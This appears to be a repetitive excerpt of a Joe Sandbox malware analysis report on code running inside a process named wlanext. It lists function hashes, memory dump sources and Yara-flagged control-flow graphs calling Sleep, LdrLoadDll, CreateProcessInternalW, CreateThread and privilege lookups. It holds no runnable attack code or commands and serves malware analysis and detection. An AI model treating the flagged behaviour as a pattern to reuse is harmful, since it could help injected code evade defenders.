                    • Opcode Fuzzy Hash: 68596cbc36d5701013fd36cf3b73d5b40afd98cb054479563db2282748efb432
                    • Instruction Fuzzy Hash: BE90026D22304502E190B159544860A00059BD1242F91D425A0006558CCA5988696361
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmp
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: ee6737c179cd50ddbdf8b4103b246a9f38a356c03f74b1cb3133dc2b1a9868f3
                    • Instruction ID: 5e5002767a8a6c3637724afd1e1d154168148d53352c888836b8b325c03dc306
                    • Opcode Fuzzy Hash: ee6737c179cd50ddbdf8b4103b246a9f38a356c03f74b1cb3133dc2b1a9868f3
                    • Instruction Fuzzy Hash: 8790027532118902E120A159844470600059BD1241F51C421A0815558D87D988917162
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmp
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 709c12bdf44a5627421d10907b2899dcc062f003c6dd7ba152494a2b663f37b6
                    • Instruction ID: 7fce38b73787ad0b26bcd51b7b68cc8ebf3fc9d18b0443625bfcc6ecc0f0a72b
                    • Opcode Fuzzy Hash: 709c12bdf44a5627421d10907b2899dcc062f003c6dd7ba152494a2b663f37b6
                    • Instruction Fuzzy Hash: DC90027521104D02E190B159444464A00059BD1341F91C025A0016654DCB598A5977E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmp
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 7a486a098a9cb238ce737db90086e42106ab030d89e39155311236a91b52fcb5
                    • Instruction ID: 04397e40828c19f348513e5b8cbb2a913de6879def685d040b92fa6b97ada45c
                    • Opcode Fuzzy Hash: 7a486a098a9cb238ce737db90086e42106ab030d89e39155311236a91b52fcb5
                    • Instruction Fuzzy Hash: CA90027521508D42E150B1594444A4600159BD0345F51C021A0055694D97698D55B6A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmp
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: fff69f6fa539cff5d0feebae5604254c532e45b6e9348d0936efa520bb9726c8
                    • Instruction ID: a65b74df553915a48cfebfafd67ea16ea8e8ea2fb8919ea23b0c8262757383b1
                    • Opcode Fuzzy Hash: fff69f6fa539cff5d0feebae5604254c532e45b6e9348d0936efa520bb9726c8
                    • Instruction Fuzzy Hash: D390026522184542E210A5694C54B0700059BD0343F51C125A0145554CCA5988616561
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmp
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 55394d89da26d6b048e47e44b938f1e4c09f3b2d542679167cd88bc5177096b6
                    • Instruction ID: 4ef5c320124e93670b5e5dfe03651aeef8c47e06637cace7cb5fa95d75397690
                    • Opcode Fuzzy Hash: 55394d89da26d6b048e47e44b938f1e4c09f3b2d542679167cd88bc5177096b6
                    • Instruction Fuzzy Hash: 259002752110CD02E120A159844474A00059BD0341F55C421A4415658D87D988917161
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmp
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: ab2c21ca3e8abd730b7ba419f1bd695bede07637e4c3ab78cbd838b6b77abf7b
                    • Instruction ID: 74a998b731eef175871c2e264360c97644abc4e36d97bac2dae4c163ae7a4f2f
                    • Opcode Fuzzy Hash: ab2c21ca3e8abd730b7ba419f1bd695bede07637e4c3ab78cbd838b6b77abf7b
                    • Instruction Fuzzy Hash: 2F90027521104D42E110A1594444B4600059BE0341F51C026A0115654D8759C8517561
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmp
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 773c299fd45c59546582445f156cb5b341ad7355d8584eb65a8236abea791e37
                    • Instruction ID: 65a846633c44f580f4b8aeda02402b27b55e0fb66534410f0b694a60eb855fa4
                    • Opcode Fuzzy Hash: 773c299fd45c59546582445f156cb5b341ad7355d8584eb65a8236abea791e37
                    • Instruction Fuzzy Hash: E19002B521104902E150B159444474600059BD0341F51C021A5055554E879D8DD576A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmp
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 7366cf7b1bb06460e63ca4c667440a68f9e6c7a7a6586fe61edf99844569f787
                    • Instruction ID: 3aec7d1f6abad5f1a9a4890b25696416d76de7a4f6ebfceadbdba06174279ce4
                    • Opcode Fuzzy Hash: 7366cf7b1bb06460e63ca4c667440a68f9e6c7a7a6586fe61edf99844569f787
                    • Instruction Fuzzy Hash: CC90047D331045031115F55D07445070047DFD53D1351C031F1007550CD775CC717171
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmp
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 2259bcd1cbe0cf87c2746fbb0de42540321ff7203be6b278b77e9f767568869e
                    • Instruction ID: bbef85932221fb65e86215c85bc4bb808809b7fcb5ed10fe583bcfd3b72f9879
                    • Opcode Fuzzy Hash: 2259bcd1cbe0cf87c2746fbb0de42540321ff7203be6b278b77e9f767568869e
                    • Instruction Fuzzy Hash: 5E9002A535104942E110A1594454B060005DBE1341F51C025E1055554D875DCC527166
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmp
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 45b0e5102c754e550ff6c113c0d64c767260180ac76106c70657cdbeffc0da12
                    • Instruction ID: 5488dc7b1e991147ea6c8245c5b0f86d3cda5f52765ff0f95cc2d8b91d41c840
                    • Opcode Fuzzy Hash: 45b0e5102c754e550ff6c113c0d64c767260180ac76106c70657cdbeffc0da12
                    • Instruction Fuzzy Hash: 9E9002A5212045035115B1594454616400A9BE0241B51C031E1005590DC66988917165
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmp
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 9b3bc06bfcc719c8c276e5e47d44e391de3e9f1e586d15c119deb7577d216194
                    • Instruction ID: 5e9e99d9a43ef368fa1b35471b4d7a186465afce851d758ba3f2bc9f7f02001a
                    • Opcode Fuzzy Hash: 9b3bc06bfcc719c8c276e5e47d44e391de3e9f1e586d15c119deb7577d216194
                    • Instruction Fuzzy Hash: EC90027521104913E121A159454470700099BD0281F91C422A0415558D979A8952B161
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmp
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: b767f2040277ba61be8a731cc75f1a6f995705f1423bc1d6518ac823d74f3dc4
                    • Instruction ID: 119d2ce9d1b5a0ae70750a54c4122c4947935ac39cb4ead079cb0f9caca9a30e
                    • Opcode Fuzzy Hash: b767f2040277ba61be8a731cc75f1a6f995705f1423bc1d6518ac823d74f3dc4
                    • Instruction Fuzzy Hash: F4900265252086526555F15944445074006ABE0281791C022A1405950C866A9856E661
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 243 a19080-a190c2 call a1bd40 246 a190c8-a19118 call a1be10 call a0acf0 call a14e50 243->246 247 a1919c-a191a2 243->247 254 a19120-a19131 Sleep 246->254 255 a19133-a19139 254->255 256 a19196-a1919a 254->256 257 a19163-a19184 call a18eb0 255->257 258 a1913b-a19161 call a18ca0 255->258 256->247 256->254 262 a19189-a1918c 257->262 258->262 262->256
                    APIs
                    • Sleep.KERNELBASE(000007D0), ref: 00A19128
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: net.dll$wininet.dll
                    • API String ID: 3472027048-1269752229
                    • Opcode ID: 7a610f761d0da1d75e76726c77c53804720eb4ac1e2d24cbc414290cef663861
                    • Instruction ID: 24150db63e1a894a091d7c1fa48b504e538655ea0411c77c134571e37a17466b
                    • Opcode Fuzzy Hash: 7a610f761d0da1d75e76726c77c53804720eb4ac1e2d24cbc414290cef663861
                    • Instruction Fuzzy Hash: 6B3190B2900745BBC724DF64C885FA7B7B9FB48B00F10851DF62A5B245DB34B690CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 263 a19076-a190af 264 a190bb-a190c2 263->264 265 a190b6 call a1bd40 263->265 266 a190c8-a19118 call a1be10 call a0acf0 call a14e50 264->266 267 a1919c-a191a2 264->267 265->264 274 a19120-a19131 Sleep 266->274 275 a19133-a19139 274->275 276 a19196-a1919a 274->276 277 a19163-a19184 call a18eb0 275->277 278 a1913b-a19161 call a18ca0 275->278 276->267 276->274 282 a19189-a1918c 277->282 278->282 282->276
                    APIs
                    • Sleep.KERNELBASE(000007D0), ref: 00A19128
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: net.dll$wininet.dll
                    • API String ID: 3472027048-1269752229
                    • Opcode ID: d6355853e6332a844b8262cb2b3490841c70380b4e5669fa948a938caf3cf782
                    • Instruction ID: 9978212eaca009e4ff5acbc13afdf033d43e762e1187f14d1f59e75d790efbe9
                    • Opcode Fuzzy Hash: d6355853e6332a844b8262cb2b3490841c70380b4e5669fa948a938caf3cf782
                    • Instruction Fuzzy Hash: BB21E1B2A00341BBC714DF64D885FA7B7B9FB48B00F14811DFA2D5B285D774A990CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 289 a1a670-a1a6a1 call a1af60 RtlFreeHeap
                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00A03AF8), ref: 00A1A69D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID: .z`
                    • API String ID: 3298025750-1441809116
                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                    • Instruction ID: db78734c87f0c72dd3d6bf3e51c9605b26e92ac1163643a57b7801f66fd8b1b4
                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                    • Instruction Fuzzy Hash: FEE012B1200208ABDB18EF99CC49EA777ACEF88760F118558BA0C5B242C630E9108AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00A0836A
                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00A0838B
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                    • Instruction ID: 135888bf08edae2b02f500a48ce1b76fca475aa25e81063837b8bf7575a90571
                    • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                    • Instruction Fuzzy Hash: D001A231A8032C7BE721A694AD43FFE776C6B40F50F050118FF04BA1C2EAE4690646F6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 502 a0acf0-a0ad0c 503 a0ad14-a0ad19 502->503 504 a0ad0f call a1cc50 502->504 505 a0ad1b-a0ad1e 503->505 506 a0ad1f-a0ad2d call a1d070 503->506 504->503 509 a0ad3d-a0ad4e call a1b4a0 506->509 510 a0ad2f-a0ad3a call a1d2f0 506->510 515 a0ad50-a0ad64 LdrLoadDll 509->515 516 a0ad67-a0ad6a 509->516 510->509 515->516
                    APIs
                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00A0AD62
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: Load
                    • String ID:
                    • API String ID: 2234796835-0
                    • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction ID: 8e56fa12db5c26b06e3d91965189348131cb8a969c5533cbf8c5db4d7bf46206
                    • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction Fuzzy Hash: 2E011EB5E4020DBBDF10DBA4ED42FDDB3789B54309F004595A90997681F631EB548B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 517 a1a6e0-a1a738 call a1af60 CreateProcessInternalW
                    APIs
                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00A1A734
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateInternalProcess
                    • String ID:
                    • API String ID: 2186235152-0
                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                    • Instruction ID: 9bdd2d156fd9a2d38df65845a8e3331a1b56b82c45ca31130e6f2f6a5ee8bd95
                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                    • Instruction Fuzzy Hash: 7D01B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 523 a191b0-a191d8 call a14e50 526 a191f7-a191fc 523->526 527 a191da-a191f6 call a1f222 CreateThread 523->527
                    APIs
                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00A0F050,?,?,00000000), ref: 00A191EC
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateThread
                    • String ID:
                    • API String ID: 2422867632-0
                    • Opcode ID: ecacb28e533d931049fcac73acfce2faf05e3b67876ae05ce95fa90aefa457bb
                    • Instruction ID: 4844faffca714121e06033bf2d338455ef9bb3006a5a8712124df29a48401b8e
                    • Opcode Fuzzy Hash: ecacb28e533d931049fcac73acfce2faf05e3b67876ae05ce95fa90aefa457bb
                    • Instruction Fuzzy Hash: 3BE092773803043AE330659DAC03FE7B39CDB81B20F140026FA0DEB2C1D995F84142A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,00A0F1D2,00A0F1D2,?,00000000,?,?), ref: 00A1A800
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: 982118f89f9998f9fc20f095bb05f6a09ef34c276847c105a409ef0d5cfb2817
                    • Instruction ID: eeeba9f244056b43d3d5136dd7d38df65c89a665670bebea2105f4bd4a833b32
                    • Opcode Fuzzy Hash: 982118f89f9998f9fc20f095bb05f6a09ef34c276847c105a409ef0d5cfb2817
                    • Instruction Fuzzy Hash: 43E092B16002147BDB10DF88CC85EE73BAADF48250F108564FD0CA7751C575E8158BF1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlAllocateHeap.NTDLL(00A14536,?,00A14CAF,00A14CAF,?,00A14536,?,?,?,?,?,00000000,00000000,?), ref: 00A1A65D
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID:
                    • API String ID: 1279760036-0
                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                    • Instruction ID: 6677d0ecbdb5cad8dea1915ef70276498e15136ce6c3ae0cd8752fbfec9d5ce6
                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                    • Instruction Fuzzy Hash: 93E012B1200208ABDB14EF99CC41EA777ACEF88664F118558BA0C5B242C630F9118AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,00A0F1D2,00A0F1D2,?,00000000,?,?), ref: 00A1A800
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                    • Instruction ID: 649a98f1a022be45ad4837e8805004660904cbd50b8d7d0f66417c008fdfceb0
                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                    • Instruction Fuzzy Hash: B5E01AB12002086BDB10DF49CC85EE737ADEF88650F118154BA0C57241C930E8118BF5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,00A0F1D2,00A0F1D2,?,00000000,?,?), ref: 00A1A800
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: a14bfa4abcacbe79f8c84cce27c31b4fbe4b4f2115a74e1ccccb0134015f2e8b
                    • Instruction ID: 420ee1fd37abf15d264720f1617d9e6e083e0b8614f50c334a00feb232c80766
                    • Opcode Fuzzy Hash: a14bfa4abcacbe79f8c84cce27c31b4fbe4b4f2115a74e1ccccb0134015f2e8b
                    • Instruction Fuzzy Hash: 55E04FB1200204BBDB20DF44CC84EE73769EF88350F118554F90D57241C631E9518BB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetErrorMode.KERNELBASE(00008003,?,00A08D14,?), ref: 00A0F6FB
                    Memory Dump Source
                    • Source File: 0000000B.00000002.634911519.0000000000A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_a00000_wlanext.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                    • Instruction ID: 538d0b5d883668abae1b4ec096c8210103a481458ced70208cc35751112e5aca
                    • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                    • Instruction Fuzzy Hash: C0D05E656503082AE610AAA89C03F6632896B44B00F490064F948AA2C3D950E4004165
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmp
                    • Associated: 0000000B.00000002.637445370.000000000341F000.00000040.00000800.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_11_2_3300000_wlanext.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 4444ae936700eaae73adfaf4aefbcd433a6db47f6b8027ba36d64aa4589a3b15
                    • Instruction ID: 254d0ed19f6d01c9f1a4768e9cce2a5880be08d8a6d4c3fb5f0e2d83501e69d1
                    • Opcode Fuzzy Hash: 4444ae936700eaae73adfaf4aefbcd433a6db47f6b8027ba36d64aa4589a3b15
                    • Instruction Fuzzy Hash: 0CB09B719015C5C9E611D7604B4871779047BD0751F16C0A1D1020641E477CC091F5B5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 53%
                    			E033BFDDA(intOrPtr* __edx, intOrPtr _a4) {
                    				void* _t7;
                    				intOrPtr _t9;
                    				intOrPtr _t10;
                    				intOrPtr* _t12;
                    				intOrPtr* _t13;
                    				intOrPtr _t14;
                    				intOrPtr* _t15;
                    
                    				_t13 = __edx;
                    				_push(_a4);
                    				_t14 =  *[fs:0x18];
                    				_t15 = _t12;
                    				_t7 = E0336CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                    				_push(_t13);
                    				E033B5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                    				_t9 =  *_t15;
                    				if(_t9 == 0xffffffff) {
                    					_t10 = 0;
                    				} else {
                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                    				}
                    				_push(_t10);
                    				_push(_t15);
                    				_push( *((intOrPtr*)(_t15 + 0xc)));
                    				_push( *((intOrPtr*)(_t14 + 0x24)));
                    				return E033B5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                    			}











                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 033BFDFA
                    Strings
                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 033BFE2B
                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 033BFE01
                    Memory Dump Source
                    • Source File: 0000000B.00000002.636937480.0000000003300000.00000040.00000800.00020000.00000000.sdmp, Offset: 03300000, based on PE: true
                    • Associated: 0000000B.00000002.637412884.000000000341B000.00000040.00000800.00020000.00000000.sdmp
